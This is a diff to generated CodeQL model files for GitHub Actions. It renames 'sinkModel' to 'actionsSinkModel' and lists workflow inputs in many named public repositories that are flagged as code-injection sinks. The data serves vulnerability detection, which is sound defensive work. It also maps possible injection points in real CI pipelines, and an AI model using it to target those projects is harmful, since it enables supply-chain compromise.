@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 71866026ef9..8f4c4432408 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 83d241d21c0..9406f7d299c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 3021de12568..36838ef4ddb 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index d2cb1da1e9f..8b16601e6c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c551a135a14..e8db2ff568d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index f469f5de268..208e444adeb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 7ec8dac3f7b..41edf0b0373 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 4ce9252ce76..faca7973f1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index abb5b43c327..76db6821c5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 9e9da70e88e..383a88ed055 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 8de3f4c1ca4..bcd3b09ed68 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 5ec8c096934..53e16f8771a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index af9582282d0..4310e028de1 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 61bbb9d5372..84d2f57a3fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index fdb440a742f..7debf6960ed 100644 
--- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index efd05d69abe..640180b870a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 9be191425ff..7ea3039b552 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 65a14c7cfaa..ced66aee32f 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 2c031ea9dc6..e63440d1fca 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index b90aacee9ca..f7021148c51 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 56823f4e1ac..8345368057c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 0f2937f9d14..3754ebfa63d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index a88c74f8537..3e35747b558 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index b7dfd8fcc9b..a13f6863caa 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 9de8130a93e..af5c300ea8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ea4980b8cd7..449ea8b7b49 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 8787c7e32c9..6656d42c4e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index ea55d53c215..6e7fdc34a54 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index add2fe0d2e2..8fc02a27e1c 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 400cd50b59f..80f19676b4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 42122b5ee22..56b2ef6691e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index c694d3953f6..7bc952a8483 100644 
--- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 9ecf401cab5..1c0663dd01c 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 19fee627702..4da8f327662 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4eb201001e1..4e8adfafe3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 94c7292b655..28cb702ce13 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 6088ffcd702..cb315ee4328 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 05c4dc8ddf3..956c4cba966 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index affc12cdc4a..804c1bdae4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index b1c4d2f2cbf..78d91b2afb5 100644 
--- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 4ccbd71f8c3..31cadc3ff17 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 2eb2104b542..11362fda1e5 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index fee95860030..131cff3e92a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 49a98d4dda5..acc5bf51e35 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", 